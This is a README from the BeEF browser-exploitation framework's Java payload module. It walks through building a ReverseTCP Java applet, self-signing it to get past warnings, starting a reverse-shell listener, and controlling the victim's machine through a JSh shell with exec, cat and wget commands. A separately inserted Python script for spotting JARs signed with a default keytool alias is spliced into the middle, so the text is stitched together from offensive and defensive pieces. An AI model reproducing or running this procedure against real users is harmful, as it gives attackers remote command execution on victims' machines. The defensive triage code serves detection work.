GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/local_host/java_payload/README.txt
--- How to use this module ---
The following is how you compile the JavaPayload handlers:

$ git clone https://github.com/schierlm/JavaPayload javapayload-git
$ cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
$ cd .. && ant compile && ant jar
$ cd build/bin
$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP

At this point you have the applet ready to go, with a ReverseTCP handler:
Applet_ReverseTCP.jar
Note that the applet in this module is already compiled with Java 7; you might want to recompile it
with Java 6 so that it also runs on those versions (SUGGESTED :-).

At this stage you need to sign the applet.
The following creates a self-signed certificate and then signs the applet with it.
Obviously if you have a valid code signing certificate, even better ;)

keytool -keystore tmp -genkey
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey

Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
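
From the defender's side, the signing step above leaves a recognisable trace: jarsigner names its META-INF signature files after the key alias (uppercased, first 8 characters), and keytool's default alias is mykey. The Python triage below is an added example, not part of the BeEF or JavaPayload code; its function names and sample JARs are constructed for illustration, and it inspects file names only, without validating any signature.

```python
import io
import zipfile
from pathlib import PurePosixPath

SIG_BLOCK_EXTS = {".RSA", ".DSA", ".EC"}   # signature block files written by jarsigner
DEFAULT_ALIAS_BASE = "MYKEY"               # keytool's default alias "mykey", uppercased


def jar_signers(jar_bytes):
    """Map each signer base name to the signature-file extensions found in META-INF/."""
    signers = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            path = PurePosixPath(name.upper())
            # Only files directly under META-INF/ count as signature files.
            if len(path.parts) == 2 and path.parts[0] == "META-INF":
                if path.suffix == ".SF" or path.suffix in SIG_BLOCK_EXTS:
                    signers.setdefault(path.stem, set()).add(path.suffix)
    return signers


def triage(jar_bytes):
    """Classify a JAR by its signature file names (heuristic, no crypto checks)."""
    signers = jar_signers(jar_bytes)
    # A signer is complete when it has both a .SF file and a signature block.
    complete = {b for b, exts in signers.items()
                if ".SF" in exts and exts & SIG_BLOCK_EXTS}
    if not complete:
        return "unsigned"
    if DEFAULT_ALIAS_BASE in complete:
        return "signed-default-alias"   # likely a throwaway keystore
    return "signed"


def build_sample_jar(sig_base=None):
    """Constructed sample input: a tiny JAR with placeholder contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("Example.class", b"constructed placeholder")
        if sig_base:
            jar.writestr(f"META-INF/{sig_base}.SF", "Signature-Version: 1.0\n")
            jar.writestr(f"META-INF/{sig_base}.DSA", b"constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for base in (None, "MYKEY", "ACMECORP"):
        print(base, "->", triage(build_sample_jar(base)))
```

A "signed-default-alias" result is a reason to inspect the signer certificate itself, for example with jarsigner -verify -verbose -certs, not a verdict on its own.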

You're now ready to rock. Start the reverse handler listener with (update payload/host/port if necessary):
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh

Now launch the BeEF module.
If the victim runs the signed Java applet, the job is done and you can interact with the applet from the reverse connection handler:
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
! help
help: show information about commands.
Usage: help [command]

Supported commands:
help - show this help
info - list system properties
pwd - show current directory
cd - change directory
ls - list directory
exec - execute native command
cat - show text file
wget - download file
telnet - create TCP connection
paste - create text file
jobs - list or continue jobs
exit - Exit JSh

When inside an interactive command, enter ~. on a new
line to exit from that command. Enter ~& to background the command.
Enter ~~ to start a line with a ~ character